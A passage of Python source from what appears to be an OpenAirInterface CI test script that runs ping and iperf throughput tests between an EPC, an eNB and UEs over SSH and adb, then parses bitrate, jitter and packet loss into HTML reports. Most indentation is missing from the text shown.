logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
logging.debug('\u001B[1;37;44m OAI UE ping result \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
self.close()
html_queue = SimpleQueue()
ip_addr = 'TBD'
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
if packetLossOK:
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
			# copy the ping log to the EPC server for log collection
if ping_from_eNB is not None:
copyin_res = self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
else:
copyin_res = self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'ping_' + self.testCase_id + '.log', self.EPCSourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
def Ping(self):
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is not None:
self.PingNoS1()
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
i = 0
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = self.Ping_common, args = (lock,UE_IPAddress,device_id,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.ping_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
ping_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
ping_status = False
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (ping_status):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
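	# Extract the test duration (-t <seconds>) from the iperf arguments.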
def Iperf_ComputeTime(self):
result = re.search('-t (?P<iperf_time>\d+)', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf time Not Found! \u001B[0m')
sys.exit(1)
return result.group('iperf_time')
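	# Rescale the requested bandwidth (-b) according to the iperf profile:
	#  - balanced   : the total bandwidth is split equally between all UEs
	#  - single-ue  : the full bandwidth is used on one UE
	#  - unbalanced : the first UE gets the bulk, the others a 2% residual each
	# Returns the iperf argument string with the new -b value substituted in.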
def Iperf_ComputeModifiedBW(self, idx, ue_num):
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf bandwidth Not Found! \u001B[0m')
sys.exit(1)
iperf_bandwidth = result.group('iperf_bandwidth')
if self.iperf_profile == 'balanced':
iperf_bandwidth_new = float(iperf_bandwidth)/ue_num
if self.iperf_profile == 'single-ue':
iperf_bandwidth_new = float(iperf_bandwidth)
if self.iperf_profile == 'unbalanced':
# residual is 2% of max bw
residualBW = float(iperf_bandwidth) / 50
if idx == 0:
iperf_bandwidth_new = float(iperf_bandwidth) - ((ue_num - 1) * residualBW)
else:
iperf_bandwidth_new = residualBW
iperf_bandwidth_str = '-b ' + iperf_bandwidth
iperf_bandwidth_str_new = '-b ' + ('%.2f' % iperf_bandwidth_new)
result = re.sub(iperf_bandwidth_str, iperf_bandwidth_str_new, str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Calculate Iperf bandwidth Failed! \u001B[0m')
sys.exit(1)
return result
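	# Parse TCP iperf results: an awk helper summarizes the client log and the
	# average/max/min bitrates are pushed to the status queue.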
def Iperf_analyzeV2TCPOutput(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
self.command('awk -f /tmp/tcp_iperf_stats.awk /tmp/CI-eNB/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('Avg Bitrate : (?P<average>[0-9\.]+ Mbits\/sec) Max Bitrate : (?P<maximum>[0-9\.]+ Mbits\/sec) Min Bitrate : (?P<minimum>[0-9\.]+ Mbits\/sec)', str(self.ssh.before))
if result is not None:
avgbitrate = result.group('average')
maxbitrate = result.group('maximum')
minbitrate = result.group('minimum')
lock.acquire()
logging.debug('\u001B[1;37;44m TCP iperf result (' + UE_IPAddress + ') \u001B[0m')
msg = 'TCP Stats :\n'
if avgbitrate is not None:
logging.debug('\u001B[1;34m Avg Bitrate : ' + avgbitrate + '\u001B[0m')
msg += 'Avg Bitrate : ' + avgbitrate + '\n'
if maxbitrate is not None:
logging.debug('\u001B[1;34m Max Bitrate : ' + maxbitrate + '\u001B[0m')
msg += 'Max Bitrate : ' + maxbitrate + '\n'
if minbitrate is not None:
logging.debug('\u001B[1;34m Min Bitrate : ' + minbitrate + '\u001B[0m')
msg += 'Min Bitrate : ' + minbitrate + '\n'
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
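	# Parse iperf (v2) client output: TCP runs are delegated to
	# Iperf_analyzeV2TCPOutput; for UDP the 'Server Report' line provides the
	# bitrate, jitter and packet loss, and the measured bitrate is compared to
	# the requested -b value. Returns 0 on success, -1 when no report is found.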
def Iperf_analyzeV2Output(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
result = re.search('-u', str(iperf_real_options))
if result is None:
return self.Iperf_analyzeV2TCPOutput(lock, UE_IPAddress, device_id, statusQueue, iperf_real_options)
result = re.search('Server Report:', str(self.ssh.before))
if result is None:
result = re.search('read failed: Connection refused', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1;37;41m Could not connect to iperf server! \u001B[0m')
else:
logging.debug('\u001B[1;37;41m Server Report and Connection refused Not Found! \u001B[0m')
return -1
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is not None:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
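		# typical UDP server report, e.g.:
		#   [  3] Server Report:
		#   [  3]  0.0-10.0 sec  1.19 MBytes  1.00 Mbits/sec   0.005 ms    0/  850 (0%)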
result = re.search('Server Report:\\\\r\\\\n(?:|\[ *\d+\].*) (?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(\d+\/..\d+) (\((?P<packetloss>[0-9\.]+)%\))', str(self.ssh.before))
if result is not None:
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
jitter = result.group('jitter')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
iperfStatus = True
msg = 'Req Bitrate : ' + req_bandwidth + '\n'
logging.debug('\u001B[1;34m Req Bitrate : ' + req_bandwidth + '\u001B[0m')
if bitrate is not None:
msg += 'Bitrate : ' + bitrate + '\n'
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
result = re.search('(?P<real_bw>[0-9\.]+) [KMG]bits/sec', str(bitrate))
if result is not None:
actual_bw = float(str(result.group('real_bw')))
result = re.search('[0-9\.]+ K', bitrate)
if result is not None:
actual_bw = actual_bw * 1000
result = re.search('[0-9\.]+ M', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000
result = re.search('[0-9\.]+ G', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000000
br_loss = 100 * actual_bw / req_bw
bitperf = '%.2f ' % br_loss
msg += 'Bitrate Perf: ' + bitperf + '%\n'
logging.debug('\u001B[1;34m Bitrate Perf: ' + bitperf + '%\u001B[0m')
if packetloss is not None:
msg += 'Packet Loss : ' + packetloss + '%\n'
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
if float(packetloss) > float(self.iperf_packetloss_threshold):
msg += 'Packet Loss too high!\n'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
iperfStatus = False
if jitter is not None:
msg += 'Jitter : ' + jitter + '\n'
logging.debug('\u001B[1;34m Jitter : ' + jitter + '\u001B[0m')
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
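	# Fallback analysis when the client report is missing: average the per-second
	# lines of the iperf server log (bitrate, jitter, lost/sent packets) and
	# compare the resulting bitrate to the requested -b value (90% threshold).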
def Iperf_analyzeV2Server(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
if (not os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
return
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is None:
logging.debug('Iperf bandwidth Not Found!')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not compute Iperf bandwidth!')
return
else:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
server_file = open('iperf_server_' + self.testCase_id + '_' + device_id + '.log', 'r')
br_sum = 0.0
ji_sum = 0.0
pl_sum = 0
ps_sum = 0
row_idx = 0
for line in server_file.readlines():
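			# each interval line looks like e.g.
			#   [  3]  0.0- 1.0 sec   122 KBytes  1.00 Mbits/sec   0.005 ms    0/   85 (0%)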
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(?P<lostPack>[0-9]+)/ +(?P<sentPack>[0-9]+)', str(line))
if result is not None:
bitrate = result.group('bitrate')
jitter = result.group('jitter')
packetlost = result.group('lostPack')
packetsent = result.group('sentPack')
br = bitrate.split(' ')
ji = jitter.split(' ')
row_idx = row_idx + 1
curr_br = float(br[0])
pl_sum = pl_sum + int(packetlost)
ps_sum = ps_sum + int(packetsent)
if (br[1] == 'Kbits/sec'):
curr_br = curr_br * 1000
if (br[1] == 'Mbits/sec'):
curr_br = curr_br * 1000 * 1000
br_sum = curr_br + br_sum
ji_sum = float(ji[0]) + ji_sum
if (row_idx > 0):
br_sum = br_sum / row_idx
ji_sum = ji_sum / row_idx
br_loss = 100 * br_sum / req_bw
if (br_sum > 1000):
br_sum = br_sum / 1000
if (br_sum > 1000):
br_sum = br_sum / 1000
bitrate = '%.2f Mbits/sec' % br_sum
else:
bitrate = '%.2f Kbits/sec' % br_sum
else:
bitrate = '%.2f bits/sec' % br_sum
bitperf = '%.2f ' % br_loss
bitperf += '%'
jitter = '%.2f ms' % (ji_sum)
if (ps_sum > 0):
pl = float(100 * pl_sum / ps_sum)
packetloss = '%2.1f ' % (pl)
packetloss += '%'
else:
packetloss = 'unknown'
lock.acquire()
if (br_loss < 90):
statusQueue.put(1)
else:
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
req_msg = 'Req Bitrate : ' + req_bandwidth
bir_msg = 'Bitrate : ' + bitrate
brl_msg = 'Bitrate Perf: ' + bitperf
jit_msg = 'Jitter : ' + jitter
pal_msg = 'Packet Loss : ' + packetloss
statusQueue.put(req_msg + '\n' + bir_msg + '\n' + brl_msg + '\n' + jit_msg + '\n' + pal_msg + '\n')
logging.debug('\u001B[1;37;45m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;35m ' + req_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + bir_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + brl_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + jit_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + pal_msg + '\u001B[0m')
lock.release()
else:
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
server_file.close()
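	# Parse iperf3 client output: extract the final bitrate and packet loss and
	# check the loss against self.iperf_packetloss_threshold.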
def Iperf_analyzeV3Output(self, lock, UE_IPAddress, device_id, statusQueue):
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?:|[0-9\.]+ ms +\d+\/\d+ \((?P<packetloss>[0-9\.]+)%\)) +(?:|receiver)\\\\r\\\\n(?:|\[ *\d+\] Sent \d+ datagrams)\\\\r\\\\niperf Done\.', str(self.ssh.before))
if result is None:
result = re.search('(?P<error>iperf: error - [a-zA-Z0-9 :]+)', str(self.ssh.before))
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
if result is not None:
logging.debug('\u001B[1;37;41m ' + result.group('error') + ' \u001B[0m')
statusQueue.put(result.group('error'))
else:
logging.debug('\u001B[1;37;41m Bitrate and/or Packet Loss Not Found! \u001B[0m')
statusQueue.put('Bitrate and/or Packet Loss Not Found!')
			lock.release()
			return
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
msg = 'Bitrate : ' + bitrate + '\n'
iperfStatus = True
if packetloss is not None:
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
msg += 'Packet Loss : ' + packetloss + '%\n'
if float(packetloss) > float(self.iperf_packetloss_threshold):
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
msg += 'Packet Loss too high!\n'
iperfStatus = False
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
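	# Uplink iperf: the server runs on the EPC (port 5001 + UE index) and the
	# client on the UE (over SSH for the OAI UE, through adb otherwise), with the
	# -R flag stripped from the client options.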
def Iperf_UL_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
udpIperf = True
result = re.search('-u', str(self.iperf_args))
if result is None:
udpIperf = False
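		# derive the EPC-side tunnel address by forcing the last octet of the UE
		# IP address to .1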
ipnumbers = UE_IPAddress.split('.')
if (len(ipnumbers) == 4):
ipnumbers[3] = '1'
EPC_Iperf_UE_IPAddress = ipnumbers[0] + '.' + ipnumbers[1] + '.' + ipnumbers[2] + '.' + ipnumbers[3]
# Launch iperf server on EPC side
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
port = 5001 + idx
if udpIperf:
self.command('echo $USER; nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
else:
self.command('echo $USER; nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
time.sleep(0.5)
self.close()
# Launch iperf client on UE
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
modified_options = modified_options.replace('-R','')
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if (device_id == 'OAI-UE'):
iperf_status = self.command('iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + ' -B ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
else:
iperf_status = self.command('stdbuf -o0 adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '" 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
# TIMEOUT Case
if iperf_status < 0:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill iperf server on EPC side
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('killall --signal SIGKILL iperf', self.EPCUserName, 5)
self.close()
# in case of failure, retrieve server log
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI-UE
if (device_id == 'OAI-UE'):
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_' + self.testCase_id + '_' + device_id + '.log', '.')
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
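	# Per-UE iperf entry point: check whether iperf or iperf3 is available on
	# Android UEs, dispatch plain-iperf -R (uplink) runs to Iperf_UL_common,
	# otherwise start the server on the UE and the client on the EPC (downlink)
	# and analyze the output.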
def Iperf_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
try:
# Single-UE profile -- iperf only on one UE
if self.iperf_profile == 'single-ue' and idx != 0:
return
useIperf3 = False
udpIperf = True
if (device_id != 'OAI-UE'):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# if by chance ADB server and EPC are on the same remote host, at least log collection will take care of it
self.command('if [ ! -d ' + self.EPCSourceCodePath + '/scripts ]; then mkdir -p ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
# Checking if iperf / iperf3 are installed
self.command('adb -s ' + device_id + ' shell "ls /data/local/tmp"', '\$', 5)
result = re.search('iperf3', str(self.ssh.before))
if result is None:
result = re.search('iperf', str(self.ssh.before))
if result is None:
message = 'Neither iperf nor iperf3 installed on UE!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
else:
useIperf3 = True
self.close()
			# with plain iperf (not iperf3), the -R (uplink) case is handled by a dedicated function
if (not useIperf3):
result = re.search('-R', str(self.iperf_args))
if result is not None:
self.Iperf_UL_common(lock, UE_IPAddress, device_id, idx, ue_num, statusQueue)
return
# Launch the IPERF server on the UE side for DL
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -u -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
if (useIperf3):
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/iperf3 -s &', '\$', 5)
else:
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
time.sleep(0.5)
self.close()
# Launch the IPERF client on the EPC side for DL
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if (useIperf3):
self.command('stdbuf -o0 iperf3 -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
clientStatus = 0
self.Iperf_analyzeV3Output(lock, UE_IPAddress, device_id, statusQueue)
else:
iperf_status = self.command('stdbuf -o0 iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
if iperf_status < 0:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill the IPERF server that runs in background
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('killall iperf', '\$', 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
self.close()
# if the client report is absent, try to analyze the server log file
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
if (device_id == 'OAI-UE'):
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
else:
self.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI UE:
if (device_id == 'OAI-UE'):
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
pass
else:
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
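	# Iperf test in noS1 mode: with -R the server runs on the eNB and the client
	# on the OAI UE, otherwise the roles are swapped; the results are analyzed
	# with the regular iperf v2 parsers and reported in the HTML page.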
def IperfNoS1(self):
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '' or self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
server_on_enb = re.search('-R', str(self.iperf_args))
if server_on_enb is not None:
iServerIPAddr = self.eNBIPAddress
iServerUser = self.eNBUserName
iServerPasswd = self.eNBPassword
iClientIPAddr = self.UEIPAddress
iClientUser = self.UEUserName
iClientPasswd = self.UEPassword
else:
iServerIPAddr = self.UEIPAddress
iServerUser = self.UEUserName
iServerPasswd = self.UEPassword
iClientIPAddr = self.eNBIPAddress
iClientUser = self.eNBUserName
iClientPasswd = self.eNBPassword
# Starting the iperf server
self.open(iServerIPAddr, iServerUser, iServerPasswd)
		# iperf_args SHALL be a client command of the form "-c <addr> -u ..."
		# client example : -c 10.0.1.2 -u -b 1M -t 30 -i 1 -fm -B 10.0.1.1
		# server example : -B 10.0.1.1 -u -s -i 1 -fm
server_options = re.sub('-u.*$', '-u -s -i 1 -fm', str(self.iperf_args))
server_options = server_options.replace('-c','-B')
self.command('rm -f /tmp/tmp_iperf_server_' + self.testCase_id + '.log', '\$', 5)
self.command('echo $USER; nohup iperf ' + server_options + ' > /tmp/tmp_iperf_server_' + self.testCase_id + '.log 2>&1 &', iServerUser, 5)
time.sleep(0.5)
self.close()
# Starting the iperf client
modified_options = self.Iperf_ComputeModifiedBW(0, 1)
modified_options = modified_options.replace('-R','')
iperf_time = self.Iperf_ComputeTime()
self.open(iClientIPAddr, iClientUser, iClientPasswd)
self.command('rm -f /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', 5)
iperf_status = self.command('stdbuf -o0 iperf ' + modified_options + ' 2>&1 | stdbuf -o0 tee /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', int(iperf_time)*5.0)
status_queue = SimpleQueue()
lock = Lock()
if iperf_status < 0:
message = 'iperf on OAI UE crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
clientStatus = -2
else:
clientStatus = self.Iperf_analyzeV2Output(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
self.close()
# Stopping the iperf server
self.open(iServerIPAddr, iServerUser, iServerPasswd)
self.command('killall --signal SIGKILL iperf', '\$', 5)
time.sleep(0.5)
self.close()
if (clientStatus == -1):
if (os.path.isfile('iperf_server_' + self.testCase_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '.log')
